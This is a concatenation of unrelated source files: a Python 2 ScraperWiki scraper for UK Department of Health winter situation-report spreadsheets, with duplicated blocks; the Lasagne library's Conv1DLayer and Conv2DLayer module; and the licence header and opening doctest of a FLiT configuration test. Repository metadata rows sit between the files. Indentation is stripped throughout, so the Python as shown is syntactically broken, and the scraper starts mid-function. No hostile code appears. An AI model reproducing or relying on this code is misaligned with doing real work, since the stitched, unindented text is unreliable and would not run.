#use cssselect method on 'root' to grab all <a> tags within a <p> tag - and put in a new list variable 'links'
links = root.cssselect('p a')
#for each item in that list variable, from the first to the second last [0:-1], put it in the variable 'link'
'''
for link in links[0:-1]:
#and print the text_content of that (after the string "link text:")
print "link text:", link.text_content()
#use the attrib.get method on 'link' to grab the href= attribute of the HTML, and put in new 'linkurl' variable
linkurl = link.attrib.get('href')
#print it
print linkurl
#run the function scrapesheets, using that variable as the parameter
scrapesheets(linkurl)
'''
urls=[]
for link in links[0:-1]: urls.append(link.attrib.get('href'))
return urls
#grabexcellinks(URL)
#--
#urls= grabexcellinks(URL)
#I'm starting to think - is the first sheet all the data to date?
#In which case, we probably need to avoid scraping this one if we're doing weekly updates
urls=[]
for url in urls[1:]:
if url not in scrapedAlready:
print url
scrapesheets3(url)
else: print "Ignoring",url
scrapesheets3('http://www.dh.gov.uk/prod_consum_dh/groups/dh_digitalassets/@dh/@en/@ps/@sta/@perf/documents/digitalasset/dh_132988.xls')
#Scrape sit reports
#Reshape data from original format - dates are facet values, and as such row vals not column vals
#Dates are given in all manner of formats in the oroginal col headings; I've made a start on parsing them but there's still work to be done
#Need to build a table that contains scraped sheets so we don't scrape them again
#TO DO - I chose some really bad column names - to, from, table; need to change these really?
#import xlrd library - documentation at https://secure.simplistix.co.uk/svn/xlrd/trunk/xlrd/doc/xlrd.html
import xlrd
import md5
import time
from time import mktime
from datetime import datetime
import scraperwiki
import lxml.html
#UTILITY FUNCTION TO DROP TABLES
def dropper(table):
if table!='':
try: scraperwiki.sqlite.execute('drop table "'+table+'"')
except: pass
#---
#http://stackoverflow.com/a/1112664/454773
import datetime
def minimalist_xldate_as_datetime(xldate, datemode):
# datemode: 0 for 1900-based, 1 for 1904-based
return (
datetime.datetime(1899, 12, 30)
+ datetime.timedelta(days=xldate + 1462 * datemode)
)
#----
#Start of with a fudge - can we assume spreadsheets are templated, same each week?
def init():
templateURL='https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Pub-file-WE-11-11-123.xls'
xlbin = scraperwiki.scrape(templateURL)
#use the open_workbook function on that new variable to create another, 'book'
book = xlrd.open_workbook(file_contents=xlbin)
#Create a table that acts as a table directory
sheetnum=0
for sheetname in book.sheet_names():
sid='id_'+str(sheetnum)
data={'id':sid,'name':sheetname}
scraperwiki.sqlite.save(["id", "name"], data)
sheetnum=sheetnum+1
#init()
#exit(-1)
def tablePatch(bd):
bd2=[]
for r in bd:
if 'tid' not in r:
r['tid']= tableLookup[r['tableName']]
bd2.append(r.copy())
elif r['tid']=='':
r['tid']= tableLookup[r['tableName']]
bd2.append(r.copy())
return bd2
def maintenanceHack1():
tables=scraperwiki.sqlite.select("* from swdata")
fulltable=scraperwiki.sqlite.select("* from fulltable")
bigdata=[]
tid={}
for t in tables:
tid[t['name']]=t['id']
for r in fulltable:
if 'tid' not in r:
r['tid']=tid[r['tableName']]
bigdata.append(r.copy())
elif r['tid']=='':
r['tid']=tid[r['tableName']]
bigdata.append(r.copy())
if len(bigdata)>1000:
scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=bigdata,verbose = 0)
bigdata=[]
scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=bigdata,verbose = 0)
#maintenanceHack1()
def init2():
tables=scraperwiki.sqlite.select("* from swdata")
for t in tables:
dropper(t['id'])
dropper('fulltable')
#dropper('swdata')
#exit(-1)
#init2()
#exit(-1)
try:
tables=scraperwiki.sqlite.select("* from swdata")
except:
tables=[]
print tables
tableLookup={}
for t in tables:
tableLookup[t['name']]=t['id']
scrapedAlready=[]
try:
scrapedtables=scraperwiki.sqlite.select("* from scraped")
for t in scrapedtables:
scrapedAlready.append(t['url'])
except: pass
def simplifiedKey(key):
key=key.replace('/','.')
#still got bad key? ???in Cancelled operations ???
#replaced to and still broken:
# 16 18.11.2012
return key
dateLookup={}
def dateNormalise(d):
#This is a bit of a hack - each time we find new date formats for the cols, we'll need to extend this
#For pattern matching strings, see http://www.tutorialspoint.com/python/time_strptime.htm
for trials in ["%d %b %y","%d %b%y",'%d-%b-%y','%d-%b-%Y','%d/%m/%Y','%d/%m/%y','%d %b %Y','%d-%m-%Y','%d/%m%Y']:
try:
d=d.strip()
dtf =datetime.datetime.fromtimestamp(mktime(time.strptime(d, trials)))
break
except:
dtf=d
if type(dtf) is datetime.datetime:
dtf=dtf.strftime("%Y-%m-%d")
return dtf
def patchDate(f,t):
tt=t.split('-')
ff=f.split('-')
f=int(ff[0])
#how to cope with month rollover
if int(tt[2])<int(f):
#so we have a month change
tt[1]=int(tt[1])-1
#There may ne an issue at year rollover but we have to see how that is represented...
if int(tt[1])==0:
print 'weekend rollover at year end - how have they represented the dates?'
tt[0]=int(tt[0])-1
tt[1]=12
#exit(-1)
fromdate='-'.join( [ str(tt[0]),str(tt[1]),str(f) ])
dtf=datetime.datetime.fromtimestamp(mktime(time.strptime(fromdate, "%Y-%m-%d")))
if type(dtf) is datetime.datetime:
fromdate=dtf.strftime("%Y-%m-%d")
else:
print dtf
exit(-1)
return fromdate
def dateRangeParse(daterange):
#----
#HORRIBLE HACK to cope with 02/122012
#-->handle in the trials parse pattern
#=daterange.replace('122012','12/2012')
#----
dd=daterange.split(' to ')
if len(dd)<2:
dd2=daterange.split(' - ')
if len(dd2)<2:
fromdate=daterange
todate=daterange
else:
fromdate=dd2[0]
todate=dd2[1]
else:
fromdate=dd[0]
todate=dd[1]
todate=dateNormalise(todate)
#I think we'll require another fudge here, eg if date is given as '6 to 8 Nov 2012' we'll need to finesse '6' to '6 Nov 2012'
fromdate=dateNormalise(fromdate)
#if len(fromdate)<3:
try:
datetime.datetime.fromtimestamp(mktime(time.strptime(fromdate, "%Y-%m-%d")))
except:
fromdate=patchDate(fromdate,todate)
return (fromdate,todate)
def scrapesheets3(XLS):
xlbin = scraperwiki.scrape(XLS)
book = xlrd.open_workbook(file_contents=xlbin)
print book.sheet_names()
for sheetname in book.sheet_names():
bigdata=[]
if sheetname in tableLookup:
tt=tableLookup[sheetname]
#If we want to clear the tables...
#dropper(tt)
else:
l=len(tableLookup)
sid='id_'+str(l)
tableLookup[sheetname]=sid
scraperwiki.sqlite.save(["id", "name"], {'id':sid,'name':sheetname} )
tt=tableLookup[sheetname]
#exit(-1) #crash out for now...
print 'Tablename:',tt
sheet = book.sheet_by_name(sheetname)
sheetwidth=len(sheet.row_values(17))
print sheetname,sheetwidth,sheet.nrows
keys={}
facetAkeys={}
tokeys={}
fromkeys={}
facetBkeys={}
for col in range(1,4):
keys[col]=sheet.row_values(14)[col]
lastfacetAkey=-1
if sheet.row_values(13)[5]!='' or sheet.row_values(13)[4]!='':
for col in range (4,sheetwidth):
if sheet.row_values(13)[col]!='':
try:
facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(13)[col],book.datemode).date().strftime("%Y-%m-%d")
except:
facetAkeys[col]=sheet.row_values(13)[col]
lastfacetAkey=facetAkeys[col]
else:
facetAkeys[col]=lastfacetAkey
if facetAkeys[col] not in dateLookup:
(fromkeys[col],tokeys[col])=dateRangeParse(facetAkeys[col])
dateLookup[facetAkeys[col]]=(fromkeys[col],tokeys[col])
else:
(fromkeys[col],tokeys[col])=dateLookup[facetAkeys[col]]
facetBkeys[col]=sheet.row_values(14)[col]
else:
for col in range (4,sheetwidth):
try:
facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(14)[col],book.datemode).date().strftime("%Y-%m-%d")
#It may make more sense to save this as a proper date - in which case just drop the strftime bit
#facetAkeys[col]=minimalist_xldate_as_datetime(sheet.row_values(14)[col],book.datemode).date()
#As query in https://scraperwiki.com/views/ou_bbc_co-pro_on_iplayer_-_bootstrap/ shows, we can do time based SQLite queries?
#TO DO? Some of the facetAkeys are date ranges, so maybe bettwe to split as facetAkeysFrom and facetAkeysTo?
##If it's not a range, set from and to as the same.
except:
facetAkeys[col]=sheet.row_values(14)[col]
if facetAkeys[col] not in dateLookup:
(fromkeys[col],tokeys[col])=dateRangeParse(facetAkeys[col])
dateLookup[facetAkeys[col]]=(fromkeys[col],tokeys[col])
else:
(fromkeys[col],tokeys[col])=dateLookup[facetAkeys[col]]
facetBkeys[col]=''
#print fromkeys
for row in range(17, sheet.nrows):
data={}
#hack fudge error trap
if sheet.row_values(row)[2]=='':continue
for col in range(1,4):
#these are typically ['SHA','Code','Name',]
data[keys[col]]=sheet.row_values(row)[col]
for col in range (4,sheetwidth):
#TO DO - change colhead to tableName
#data['table']=sheetname
data['tableName']=sheetname
data['facetA']=facetAkeys[col]
#TO DO - change colhead to fromDateStr
#data['from']=fromkeys[col]
data['fromDateStr']=fromkeys[col]
#TO DO - change colhead to toDateStr
#data['to']=tokeys[col]
data['toDateStr']=tokeys[col]
data['facetB']=facetBkeys[col]
data["value"]=sheet.row_values(row)[col]
data['id']=md5.new(''.join([ data['tableName'],data['Code'],data['fromDateStr'],data['facetB'] ])).hexdigest()
#scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=data)
#If we get properly unique keys - uniqid - eg as in hash idea above but also adding tt into hash mix, we can do a fulltable?
#scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=data,verbose = 0)
#If data variable persists, the pass by reference append of the data dict breaks bigdata; so force append by value instead
bigdata.append(data.copy())
if len(bigdata)>1000:
scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=bigdata,verbose = 0)
#scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=tablePatch(bigdata),verbose = 0)
bigdata=[]
#Tidy up by saving any data that's left outstanding
scraperwiki.sqlite.save(unique_keys=['id'],table_name=tt, data=bigdata,verbose = 0)
#scraperwiki.sqlite.save(unique_keys=['id'],table_name='fulltable', data=tablePatch(bigdata),verbose = 0)
bigdata=[]
scraperwiki.sqlite.save(unique_keys=['url'],table_name='scraped', data={'url':XLS})
#TESTING
#scrapesheets2('https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls')
#scrapesheets3('https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls')
#From a scraper by paulbradshaw
#define our URL - this links to all the spreadsheets
#URL = 'http://transparency.dh.gov.uk/2012/10/26/winter-pressures-daily-situation-reports-2012-13/'
URL='http://www.dh.gov.uk/en/Publicationsandstatistics/Statistics/Performancedataandstatistics/DailySituationReports/index.htm'
#HTML to grab is:
#<p><strong>November 2012</strong><br />
#<a href="https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Web-file-WE-18-11-12.xls">DailySR – week ending 18 Nov 12.xls (492KB).</a><br />
#<a href="https://www.wp.dh.gov.uk/transparency/files/2012/10/DailySR-Pub-file-WE-11-11-123.xls">DailySR – 6 Nov 12 to 11 Nov 12.xls (446KB)</a>.</p>
#HTML to avoid that generates an error is:
#<p>Data for this collection is available back to November 2010.<br />
#For previous years’ data <a #href="http://www.dh.gov.uk/en/Publicationsandstatistics/Statistics/Performancedataandstatistics/DailySituationReports/index.htm">click here</a>.</p>
#Create a new function which takes one parameter and names it 'URL'
def grabexcellinks(URL):
#Use Scraperwiki's scrape function on 'URL', put results in new variable 'html'
html = scraperwiki.scrape(URL)
#and show it us
print html
#Use lxml.html's fromstring function on 'html', put results in new variable 'root'
root = lxml.html.fromstring(html)
#use cssselect method on 'root' to grab all <a> tags within a <p> tag - and put in a new list variable 'links'
links = root.cssselect('p a')
#for each item in that list variable, from the first to the second last [0:-1], put it in the variable 'link'
'''
for link in links[0:-1]:
#and print the text_content of that (after the string "link text:")
print "link text:", link.text_content()
#use the attrib.get method on 'link' to grab the href= attribute of the HTML, and put in new 'linkurl' variable
linkurl = link.attrib.get('href')
#print it
print linkurl
#run the function scrapesheets, using that variable as the parameter
scrapesheets(linkurl)
'''
urls=[]
for link in links[0:-1]: urls.append(link.attrib.get('href'))
return urls
#grabexcellinks(URL)
#--
#urls= grabexcellinks(URL)
#I'm starting to think - is the first sheet all the data to date?
#In which case, we probably need to avoid scraping this one if we're doing weekly updates
urls=[]
for url in urls[1:]:
if url not in scrapedAlready:
print url
scrapesheets3(url)
else: print "Ignoring",url
scrapesheets3('http://www.dh.gov.uk/prod_consum_dh/groups/dh_digitalassets/@dh/@en/@ps/@sta/@perf/documents/digitalasset/dh_132988.xls')
| [
"pallih@kaninka.net"
] | pallih@kaninka.net |
98b6ff482a1ec4bd5a748377edc96a38f4733156 | 13a32b92b1ba8ffb07e810dcc8ccdf1b8b1671ab | /home--tommy--mypy/mypy/lib/python2.7/site-packages/lasagne/layers/conv.py | 3b3dde508751920cdb89839ce4bb86786464924e | [
"Unlicense"
] | permissive | tommybutler/mlearnpy2 | 8ec52bcd03208c9771d8d02ede8eaa91a95bda30 | 9e5d377d0242ac5eb1e82a357e6701095a8ca1ff | refs/heads/master | 2022-10-24T23:30:18.705329 | 2022-10-17T15:41:37 | 2022-10-17T15:41:37 | 118,529,175 | 0 | 2 | Unlicense | 2022-10-15T23:32:18 | 2018-01-22T23:27:10 | Python | UTF-8 | Python | false | false | 20,404 | py | import theano.tensor as T
from .. import init
from .. import nonlinearities
from ..utils import as_tuple
from ..theano_extensions import conv, padding
from .base import Layer
__all__ = [
"Conv1DLayer",
"Conv2DLayer",
]
def conv_output_length(input_length, filter_size, stride, pad=0):
"""Helper function to compute the output size of a convolution operation
This function computes the length along a single axis, which corresponds
to a 1D convolution. It can also be used for convolutions with higher
dimensionalities by using it individually for each axis.
Parameters
----------
input_length : int
The size of the input.
filter_size : int
The size of the filter.
stride : int
The stride of the convolution operation.
pad : int, 'full' or 'same' (default: 0)
By default, the convolution is only computed where the input and the
filter fully overlap (a valid convolution). When ``stride=1``, this
yields an output that is smaller than the input by ``filter_size - 1``.
The `pad` argument allows you to implicitly pad the input with zeros,
extending the output size.
A single integer results in symmetric zero-padding of the given size on
both borders.
``'full'`` pads with one less than the filter size on both sides. This
is equivalent to computing the convolution wherever the input and the
filter overlap by at least one position.
``'same'`` pads with half the filter size on both sides (one less on
the second side for an even filter size). When ``stride=1``, this
results in an output size equal to the input size.
Returns
-------
int
The output size corresponding to the given convolution parameters.
Raises
------
RuntimeError
When an invalid padding is specified, a `RuntimeError` is raised.
"""
if input_length is None:
return None
if pad == 'valid':
output_length = input_length - filter_size + 1
elif pad == 'full':
output_length = input_length + filter_size - 1
elif pad == 'same':
output_length = input_length
elif isinstance(pad, int):
output_length = input_length + 2 * pad - filter_size + 1
else:
raise ValueError('Invalid pad: {0}'.format(pad))
# This is the integer arithmetic equivalent to
# np.ceil(output_length / stride)
output_length = (output_length + stride - 1) // stride
return output_length
class Conv1DLayer(Layer):
"""
lasagne.layers.Conv1DLayer(incoming, num_filters, filter_size, stride=1,
pad=0, untie_biases=False, W=lasagne.init.GlorotUniform(),
b=lasagne.init.Constant(0.), nonlinearity=lasagne.nonlinearities.rectify,
convolution=lasagne.theano_extensions.conv.conv1d_mc0, **kwargs)
1D convolutional layer
Performs a 1D convolution on its input and optionally adds a bias and
applies an elementwise nonlinearity.
Parameters
----------
incoming : a :class:`Layer` instance or a tuple
The layer feeding into this layer, or the expected input shape. The
output of this layer should be a 3D tensor, with shape
``(batch_size, num_input_channels, input_length)``.
num_filters : int
The number of learnable convolutional filters this layer has.
filter_size : int or iterable of int
An integer or a 1-element tuple specifying the size of the filters.
stride : int or iterable of int
An integer or a 1-element tuple specifying the stride of the
convolution operation.
pad : int, iterable of int, 'full', 'same' or 'valid' (default: 0)
By default, the convolution is only computed where the input and the
filter fully overlap (a valid convolution). When ``stride=1``, this
yields an output that is smaller than the input by ``filter_size - 1``.
The `pad` argument allows you to implicitly pad the input with zeros,
extending the output size.
An integer or a 1-element tuple results in symmetric zero-padding of
the given size on both borders.
``'full'`` pads with one less than the filter size on both sides. This
is equivalent to computing the convolution wherever the input and the
filter overlap by at least one position.
``'same'`` pads with half the filter size on both sides (one less on
the second side for an even filter size). When ``stride=1``, this
results in an output size equal to the input size.
``'valid'`` is an alias for ``0`` (no padding / a valid convolution).
untie_biases : bool (default: False)
If ``False``, the layer will have a bias parameter for each channel,
which is shared across all positions in this channel. As a result, the
`b` attribute will be a vector (1D).
If True, the layer will have separate bias parameters for each
position in each channel. As a result, the `b` attribute will be a
matrix (2D).
W : Theano shared variable, numpy array or callable
An initializer for the weights of the layer. This should initialize the
layer weights to a 3D array with shape
``(num_filters, num_input_channels, filter_length)``.
See :func:`lasagne.utils.create_param` for more information.
b : Theano shared variable, numpy array, callable or None
An initializer for the biases of the layer. If None is provided, the
layer will have no biases. This should initialize the layer biases to
a 1D array with shape ``(num_filters,)`` if `untied_biases` is set to
``False``. If it is set to ``True``, its shape should be
``(num_filters, input_length)`` instead.
See :func:`lasagne.utils.create_param` for more information.
nonlinearity : callable or None
The nonlinearity that is applied to the layer activations. If None
is provided, the layer will be linear.
convolution : callable
The convolution implementation to use. The
`lasagne.theano_extensions.conv` module provides some alternative
implementations for 1D convolutions, because the Theano API only
features a 2D convolution implementation. Usually it should be fine
to leave this at the default value.
**kwargs
Any additional keyword arguments are passed to the `Layer` superclass.
Attributes
----------
W : Theano shared variable
Variable representing the filter weights.
b : Theano shared variable
Variable representing the biases.
Notes
-----
Theano's underlying convolution (:func:`theano.tensor.nnet.conv.conv2d`)
only supports ``pad=0`` and ``pad='full'``. This layer emulates other modes
by cropping a full convolution or explicitly padding the input with zeros.
"""
def __init__(self, incoming, num_filters, filter_size, stride=1,
pad=0, untie_biases=False,
W=init.GlorotUniform(), b=init.Constant(0.),
nonlinearity=nonlinearities.rectify,
convolution=conv.conv1d_mc0, **kwargs):
super(Conv1DLayer, self).__init__(incoming, **kwargs)
if nonlinearity is None:
self.nonlinearity = nonlinearities.identity
else:
self.nonlinearity = nonlinearity
self.num_filters = num_filters
self.filter_size = as_tuple(filter_size, 1)
self.stride = as_tuple(stride, 1)
self.untie_biases = untie_biases
self.convolution = convolution
if pad == 'valid':
self.pad = (0,)
elif pad in ('full', 'same'):
self.pad = pad
else:
self.pad = as_tuple(pad, 1, int)
self.W = self.add_param(W, self.get_W_shape(), name="W")
if b is None:
self.b = None
else:
if self.untie_biases:
biases_shape = (num_filters, self.output_shape[2])
else:
biases_shape = (num_filters,)
self.b = self.add_param(b, biases_shape, name="b",
regularizable=False)
def get_W_shape(self):
"""Get the shape of the weight matrix `W`.
Returns
-------
tuple of int
The shape of the weight matrix.
"""
num_input_channels = self.input_shape[1]
return (self.num_filters, num_input_channels, self.filter_size[0])
def get_output_shape_for(self, input_shape):
pad = self.pad if isinstance(self.pad, tuple) else (self.pad,)
output_length = conv_output_length(input_shape[2],
self.filter_size[0],
self.stride[0],
pad[0])
return (input_shape[0], self.num_filters, output_length)
def get_output_for(self, input, input_shape=None, **kwargs):
# the optional input_shape argument is for when get_output_for is
# called directly with a different shape than self.input_shape.
if input_shape is None:
input_shape = self.input_shape
if self.stride == (1,) and self.pad == 'same':
# simulate same convolution by cropping a full convolution
conved = self.convolution(input, self.W, subsample=self.stride,
image_shape=input_shape,
filter_shape=self.get_W_shape(),
border_mode='full')
shift = (self.filter_size[0] - 1) // 2
conved = conved[:, :, shift:input.shape[2] + shift]
else:
# no padding needed, or explicit padding of input needed
if self.pad == 'full':
border_mode = 'full'
pad = (0, 0)
elif self.pad == 'same':
border_mode = 'valid'
pad = self.filter_size[0] // 2, (self.filter_size[0] - 1) // 2
else:
border_mode = 'valid'
pad = (self.pad[0], self.pad[0])
if pad != (0, 0):
input = padding.pad(input, [pad], batch_ndim=2)
input_shape = (input_shape[0], input_shape[1],
None if input_shape[2] is None else
input_shape[2] + pad[0] + pad[1])
conved = self.convolution(input, self.W, subsample=self.stride,
image_shape=input_shape,
filter_shape=self.get_W_shape(),
border_mode=border_mode)
if self.b is None:
activation = conved
elif self.untie_biases:
activation = conved + self.b.dimshuffle('x', 0, 1)
else:
activation = conved + self.b.dimshuffle('x', 0, 'x')
return self.nonlinearity(activation)
class Conv2DLayer(Layer):
"""
lasagne.layers.Conv2DLayer(incoming, num_filters, filter_size,
stride=(1, 1), pad=0, untie_biases=False,
W=lasagne.init.GlorotUniform(), b=lasagne.init.Constant(0.),
nonlinearity=lasagne.nonlinearities.rectify,
convolution=theano.tensor.nnet.conv2d, **kwargs)
2D convolutional layer
Performs a 2D convolution on its input and optionally adds a bias and
applies an elementwise nonlinearity.
Parameters
----------
incoming : a :class:`Layer` instance or a tuple
The layer feeding into this layer, or the expected input shape. The
output of this layer should be a 4D tensor, with shape
``(batch_size, num_input_channels, input_rows, input_columns)``.
num_filters : int
The number of learnable convolutional filters this layer has.
filter_size : int or iterable of int
An integer or a 2-element tuple specifying the size of the filters.
stride : int or iterable of int
An integer or a 2-element tuple specifying the stride of the
convolution operation.
pad : int, iterable of int, 'full', 'same' or 'valid' (default: 0)
By default, the convolution is only computed where the input and the
filter fully overlap (a valid convolution). When ``stride=1``, this
yields an output that is smaller than the input by ``filter_size - 1``.
The `pad` argument allows you to implicitly pad the input with zeros,
extending the output size.
A single integer results in symmetric zero-padding of the given size on
all borders, a tuple of two integers allows different symmetric padding
per dimension.
``'full'`` pads with one less than the filter size on both sides. This
is equivalent to computing the convolution wherever the input and the
filter overlap by at least one position.
``'same'`` pads with half the filter size on both sides (one less on
the second side for an even filter size). When ``stride=1``, this
results in an output size equal to the input size.
``'valid'`` is an alias for ``0`` (no padding / a valid convolution).
Note that ``'full'`` and ``'same'`` can be faster than equivalent
integer values due to optimizations by Theano.
untie_biases : bool (default: False)
If ``False``, the layer will have a bias parameter for each channel,
which is shared across all positions in this channel. As a result, the
`b` attribute will be a vector (1D).
If True, the layer will have separate bias parameters for each
position in each channel. As a result, the `b` attribute will be a
3D tensor.
W : Theano shared variable, numpy array or callable
An initializer for the weights of the layer. This should initialize the
layer weights to a 4D array with shape
``(num_filters, num_input_channels, filter_rows, filter_columns)``.
See :func:`lasagne.utils.create_param` for more information.
b : Theano shared variable, numpy array, callable or None
An initializer for the biases of the layer. If None is provided, the
layer will have no biases. This should initialize the layer biases to
a 1D array with shape ``(num_filters,)`` if `untied_biases` is set to
``False``. If it is set to ``True``, its shape should be
``(num_filters, input_rows, input_columns)`` instead.
See :func:`lasagne.utils.create_param` for more information.
nonlinearity : callable or None
The nonlinearity that is applied to the layer activations. If None
is provided, the layer will be linear.
convolution : callable
The convolution implementation to use. Usually it should be fine to
leave this at the default value.
**kwargs
Any additional keyword arguments are passed to the `Layer` superclass.
Attributes
----------
W : Theano shared variable
Variable representing the filter weights.
b : Theano shared variable
Variable representing the biases.
Notes
-----
Theano's underlying convolution (:func:`theano.tensor.nnet.conv.conv2d`)
only supports ``pad=0`` and ``pad='full'``. This layer emulates other modes
by cropping a full convolution or explicitly padding the input with zeros.
"""
def __init__(self, incoming, num_filters, filter_size, stride=(1, 1),
pad=0, untie_biases=False,
W=init.GlorotUniform(), b=init.Constant(0.),
nonlinearity=nonlinearities.rectify,
convolution=T.nnet.conv2d, **kwargs):
super(Conv2DLayer, self).__init__(incoming, **kwargs)
if nonlinearity is None:
self.nonlinearity = nonlinearities.identity
else:
self.nonlinearity = nonlinearity
self.num_filters = num_filters
self.filter_size = as_tuple(filter_size, 2)
self.stride = as_tuple(stride, 2)
self.untie_biases = untie_biases
self.convolution = convolution
if pad == 'valid':
self.pad = (0, 0)
elif pad in ('full', 'same'):
self.pad = pad
else:
self.pad = as_tuple(pad, 2, int)
self.W = self.add_param(W, self.get_W_shape(), name="W")
if b is None:
self.b = None
else:
if self.untie_biases:
biases_shape = (num_filters, self.output_shape[2], self.
output_shape[3])
else:
biases_shape = (num_filters,)
self.b = self.add_param(b, biases_shape, name="b",
regularizable=False)
def get_W_shape(self):
"""Get the shape of the weight matrix `W`.
Returns
-------
tuple of int
The shape of the weight matrix.
"""
num_input_channels = self.input_shape[1]
return (self.num_filters, num_input_channels, self.filter_size[0],
self.filter_size[1])
def get_output_shape_for(self, input_shape):
pad = self.pad if isinstance(self.pad, tuple) else (self.pad,) * 2
output_rows = conv_output_length(input_shape[2],
self.filter_size[0],
self.stride[0],
pad[0])
output_columns = conv_output_length(input_shape[3],
self.filter_size[1],
self.stride[1],
pad[1])
return (input_shape[0], self.num_filters, output_rows, output_columns)
def get_output_for(self, input, input_shape=None, **kwargs):
# The optional input_shape argument is for when get_output_for is
# called directly with a different shape than self.input_shape.
if input_shape is None:
input_shape = self.input_shape
if self.stride == (1, 1) and self.pad == 'same':
# simulate same convolution by cropping a full convolution
conved = self.convolution(input, self.W, subsample=self.stride,
image_shape=input_shape,
filter_shape=self.get_W_shape(),
border_mode='full')
shift_x = (self.filter_size[0] - 1) // 2
shift_y = (self.filter_size[1] - 1) // 2
conved = conved[:, :, shift_x:input.shape[2] + shift_x,
shift_y:input.shape[3] + shift_y]
else:
# no padding needed, or explicit padding of input needed
if self.pad == 'full':
border_mode = 'full'
pad = [(0, 0), (0, 0)]
elif self.pad == 'same':
border_mode = 'valid'
pad = [(self.filter_size[0] // 2,
(self.filter_size[0] - 1) // 2),
(self.filter_size[1] // 2,
(self.filter_size[1] - 1) // 2)]
else:
border_mode = 'valid'
pad = [(self.pad[0], self.pad[0]), (self.pad[1], self.pad[1])]
if pad != [(0, 0), (0, 0)]:
input = padding.pad(input, pad, batch_ndim=2)
input_shape = (input_shape[0], input_shape[1],
None if input_shape[2] is None else
input_shape[2] + pad[0][0] + pad[0][1],
None if input_shape[3] is None else
input_shape[3] + pad[1][0] + pad[1][1])
conved = self.convolution(input, self.W, subsample=self.stride,
image_shape=input_shape,
filter_shape=self.get_W_shape(),
border_mode=border_mode)
if self.b is None:
activation = conved
elif self.untie_biases:
activation = conved + self.b.dimshuffle('x', 0, 1, 2)
else:
activation = conved + self.b.dimshuffle('x', 0, 'x', 'x')
return self.nonlinearity(activation)
# TODO: add Conv3DLayer
| [
"tbutler.github@internetalias.net"
] | tbutler.github@internetalias.net |
983d4615eb75145cbb024178a9271475c82399be | 29a38674cd5cda4880d539ee235ea118b750571e | /tests/flit_cli/flit_update/tst_badconfig.py | 495501f01a3766375523bcada2ceebbb585b41c1 | [] | no_license | hbrunie/FLiT | 1f0be509f776b86380b215b30e7b365921dd3425 | 836bc3cd2befebc9cfe20926fd855b1f5d29ae17 | refs/heads/master | 2020-07-09T20:26:40.644089 | 2019-04-10T18:47:25 | 2019-04-10T18:47:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,702 | py | # -- LICENSE BEGIN --
#
# Copyright (c) 2015-2018, Lawrence Livermore National Security, LLC.
#
# Produced at the Lawrence Livermore National Laboratory
#
# Written by
# Michael Bentley (mikebentley15@gmail.com),
# Geof Sawaya (fredricflinstone@gmail.com),
# and Ian Briggs (ian.briggs@utah.edu)
# under the direction of
# Ganesh Gopalakrishnan
# and Dong H. Ahn.
#
# LLNL-CODE-743137
#
# All rights reserved.
#
# This file is part of FLiT. For details, see
# https://pruners.github.io/flit
# Please also read
# https://github.com/PRUNERS/FLiT/blob/master/LICENSE
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# - Redistributions of source code must retain the above copyright
# notice, this list of conditions and the disclaimer below.
#
# - Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the disclaimer
# (as noted below) in the documentation and/or other materials
# provided with the distribution.
#
# - Neither the name of the LLNS/LLNL nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL LAWRENCE LIVERMORE NATIONAL
# SECURITY, LLC, THE U.S. DEPARTMENT OF ENERGY OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
#
# Additional BSD Notice
#
# 1. This notice is required to be provided under our contract
# with the U.S. Department of Energy (DOE). This work was
# produced at Lawrence Livermore National Laboratory under
# Contract No. DE-AC52-07NA27344 with the DOE.
#
# 2. Neither the United States Government nor Lawrence Livermore
# National Security, LLC nor any of their employees, makes any
# warranty, express or implied, or assumes any liability or
# responsibility for the accuracy, completeness, or usefulness of
# any information, apparatus, product, or process disclosed, or
# represents that its use would not infringe privately-owned
# rights.
#
# 3. Also, reference herein to any specific commercial products,
# process, or services by trade name, trademark, manufacturer or
# otherwise does not necessarily constitute or imply its
# endorsement, recommendation, or favoring by the United States
# Government or Lawrence Livermore National Security, LLC. The
# views and opinions of authors expressed herein do not
# necessarily state or reflect those of the United States
# Government or Lawrence Livermore National Security, LLC, and
# shall not be used for advertising or product endorsement
# purposes.
#
# -- LICENSE END --
'''
Tests error cases in the configuration file, such as specifying more than one of a certain type of compiler.
>>> from io import StringIO
>>> import os
>>> import shutil
>>> from tst_common_funcs import runconfig
>>> configstr = \\
... '[dev_build]\\n' \\
... 'compiler_name = \\'name-does-not-exist\\'\\n'
>>> runconfig(configstr)
Traceback (most recent call last):
...
